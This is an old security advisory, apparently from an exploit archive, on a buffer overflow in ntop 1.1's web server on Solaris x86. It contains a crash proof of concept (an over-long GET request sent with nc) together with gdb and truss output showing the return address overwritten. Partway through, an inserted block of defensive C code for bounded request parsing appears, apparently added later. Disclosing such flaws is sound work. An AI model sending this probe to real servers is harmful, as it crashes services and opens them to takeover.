alt3kx-advisories-2001-002.txt
Posted Aug 25, 2001
Authored by Alt3kx

Ntop v1.1 for Solaris/x86 contains a remotely exploitable buffer overflow in the http server which defaults to tcp port 8080.

tags | exploit, web, overflow, x86, tcp
systems | solaris
MD5 | b835b14e9bd0431144499b6dc3c5e6c7

======================================================================

Remote Buffer Overflow Under Solaris_x86
NTOP - Network Monitor, vulnerable to system compromise



Author: alt3kx! <alt3kx@@raza-mexicana.org>
Alternative: <alt3kx_h3z@hotmail.com>
Date: 2001-05-23
Site: www.raza-mexicana.org


Greets to: _0x90_, Dex, PaTa, Rebel and S0r from AR & Spain
Teams: Raregazz - X-ploit and S0d


and especially to White-B

======================================================================
------------------------=[Brief Description]=-------------------------

A buffer overflow exists at around 300 characters: by sending an over-long
request to the port the daemon is listening on (port 8080 in this case),
a user can execute malicious code to obtain elevated privileges.


--------------------------=[Platforms]=--------------------------


Sun Solaris 7.0_x86
Sun Solaris 2.6_x86


---------------------------=[Summary]=----------------------------


Proof of concept :

# ls -la /opt/ntop/bin/ntop
-rwsr-xr-x 1 bin bin 249680 May 3 1999 /opt/ntop/bin/ntop
#


Step one:

Run the ntop daemon as root:

# /opt/ntop/bin/ntop -w 8080
ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0.
Copyright 1998-99 by Luca Deri <deri@unipi.it>
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
.
.
.
.
.



Step two:

Run the following command as a normal user:


[local]:alt3kx# printf "GET /`perl -e 'print "A"x245'`\r\n\r\n" |nc localhost 8080
HTTP/1.0 200 OK
Server: ntop/1.1 (i386-pc-solaris2.7)
Content-type: text/html

<HTML>
<HEAD>
<META HTTP-EQUIV=REFRESH CONTENT=120>
</HEAD>
<BODY BGCOLOR=#FFFFFF>
<P><H1><FONT FACE=Helvetica>Unable to find information related to
host<i>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>
</HEAD>
<BODY BGCOLOR=#FFFFFF>
FRESH
CONTENT=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</i></FONT></H1>
</CENTER>

</CENTER><hr><FONT FACE=Helvetica><H5>Generated by <A
HREF="http://www-serra.unipi.it/~ntop/">ntop</A> v.1.1 MT
[i386-pc-solaris2.7] listening on elxl0<br>
<address>&copy; 1998-99 by <A HREF=mailto:deri@unipi.it>L.
Deri</A></H5></font></BODY></HTML>
[local]:alt3kx#

SUCKS!!! NOT FUNCTIONAL, AGAIN with more A's :-)



[local]:alt3kx# printf "GET /`perl -e 'print "A"x246'`\r\n\r\n" |nc localhost 8080
[local]:alt3kx#




In the other shell you can see this:

# /opt/ntop/bin/ntop -w 8080
ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0.
Copyright 1998-99 by Luca Deri <deri@unipi.it>
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
Segmentation Fault(coredump)
#

[local]:alt3kx# gdb ntop --core=core
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-pc-solaris2.7"...
Core was generated by `ntop'.
Program terminated with signal 11, Segmentation Fault.
Reading symbols from /lib/libsocket.so.1...done.
Reading symbols from /lib/libnsl.so.1...done.
Reading symbols from /lib/libgen.so.1...done.
Reading symbols from /lib/libc.so.1...done.
Reading symbols from /lib/libdl.so.1...done.
Reading symbols from /lib/libmp.so.2...done.
#0 0x41414141 in ?? ()

(gdb) info all-registers
eax 0x1 1
ecx 0xdffe19c8 -536995384
edx 0x20a 522
ebx 0x80cef44 135065412
esp 0x8046f14 0x8046f14
ebp 0x41414141 0x41414141
esi 0xc8 200
edi 0x80980f5 134840565
eip 0x41414141 0x41414141
eflags 0x10206 66054
cs 0x17 23
ss 0x1f 31
ds 0x1f 31
es 0x1f 31
fs 0x0 0
gs 0x0 0
(gdb)


[local]:alt3kx# truss /opt/ntop/bin/ntop



open("/dev/zero", O_RDONLY) = 3
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0xDFFE1000
sysconfig(_CONFIG_PAGESIZE) = 4096
open("./libsocket.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libsocket.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFDF000
mmap(0x00000000, 40960, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFD4000
mmap(0xDFFDC000, 5712, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 28672) = 0xDFFDC000
close(4) = 0

open("./libnsl.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libnsl.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
mmap(0x00000000, 503808, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =
0xDFF58000
mmap(0xDFFC5000, 23248, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 442368) = 0xDFFC5000
mmap(0xDFFCB000, 29472, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFFCB000
close(4) = 0
open("./libgen.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libgen.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
mmap(0x00000000, 32768, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFF4F000
mmap(0xDFF55000, 4184, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 20480) = 0xDFF55000
close(4) = 0
open("./libc.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libc.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
mmap(0x00000000, 593920, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =
0xDFEBD000
mmap(0xDFF46000, 25448, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 557056) = 0xDFF46000
mmap(0xDFF4D000, 3316, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFF4D000
close(4) = 0
open("./libdl.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libdl.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
close(4) = 0
open("./libmp.so.2", O_RDONLY) Err#2 ENOENT
open("/lib/libmp.so.2", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEBB000
mmap(0x00000000, 16384, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEB6000
mmap(0xDFEB9000, 2524, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 8192) = 0xDFEB9000
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0xDFEB4000
close(4) = 0
close(3) = 0


[...............]


door_info(3, 0x08044528) = 0
door_call(3, 0x08044510) = 0
door_info(3, 0x080465E0) = 0
door_call(3, 0x080465C8) = 0
door_info(3, 0x080465E0) = 0
door_call(3, 0x080465C8) = 0
door_info(3, 0x080465E0) = 0
door_call(3, 0x080465C8) = 0
Incurred fault #6, FLTBOUNDS %pc = 0x41414141
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***
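The register dump and truss output above (EIP and EBP both 0x41414141) show the request target overwriting the saved frame pointer and return address on the stack. The C below is an added example, not ntop's code: a bounded request-target parser of the kind that prevents this class of bug, plus a helper that rebuilds the advisory's 245/246-byte probe offline. The 246-byte cap and all function names are assumptions, not values from ntop's source.

```c
#include <string.h>

/* Assumed cap, not taken from ntop's source: the advisory shows 245 'A's
 * surviving and 246 crashing, so "/" + 245 bytes = 246 is the limit here. */
#define MAX_TARGET_LEN 246

enum { TARGET_OK = 0, TARGET_BAD_REQUEST = -1, TARGET_TOO_LONG = -2 };

/* Copy the target of "GET <target> HTTP/1.x\r\n" into out.  EIP == EBP ==
 * 0x41414141 in the core dump is the signature of an unbounded copy of this
 * field into a fixed stack buffer; here every write is bounded by outsz and
 * an over-long target is refused (a real server would answer 414). */
int parse_request_target(const char *line, char *out, size_t outsz)
{
    const char *p;
    size_t len;
    if (line == NULL || out == NULL || outsz == 0)
        return TARGET_BAD_REQUEST;
    if (strncmp(line, "GET ", 4) != 0)
        return TARGET_BAD_REQUEST;
    p = line + 4;
    len = strcspn(p, " \r\n");   /* stops at SP, CR, LF or NUL: no over-read */
    if (len == 0 || p[0] != '/')
        return TARGET_BAD_REQUEST;
    if (len > MAX_TARGET_LEN || len >= outsz)
        return TARGET_TOO_LONG;
    memcpy(out, p, len);
    out[len] = '\0';
    return TARGET_OK;
}

/* Rebuild the advisory's probe offline: "GET /" + n_as 'A' bytes + " HTTP/1.0". */
int probe_a_run(size_t n_as)
{
    char line[600], target[MAX_TARGET_LEN + 1];
    if (n_as > sizeof line - 32)          /* keep the constructed line in bounds */
        return TARGET_BAD_REQUEST;
    memcpy(line, "GET /", 5);
    memset(line + 5, 'A', n_as);
    memcpy(line + 5 + n_as, " HTTP/1.0\r\n", 12);   /* 11 chars plus NUL */
    return parse_request_target(line, target, sizeof target);
}

/* Parse line and compare the extracted target with expected (1 = match). */
int target_equals(const char *line, const char *expected)
{
    char out[MAX_TARGET_LEN + 1];
    return parse_request_target(line, out, sizeof out) == TARGET_OK
        && strcmp(out, expected) == 0;
}
```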



bug discovered by alt3kx! <alt3kx@raza-mexicana.org> &
<alt3kx_h3z@hotmail.com>


Possible C0de coming soon .... je :-)


---------------------------=[PATCH]=-----------------------------

Download the latest packages from Sun Microsystems

-------------------------=[Company Compromise]=-------------------

http://www.sun.com
http://www.ntop.org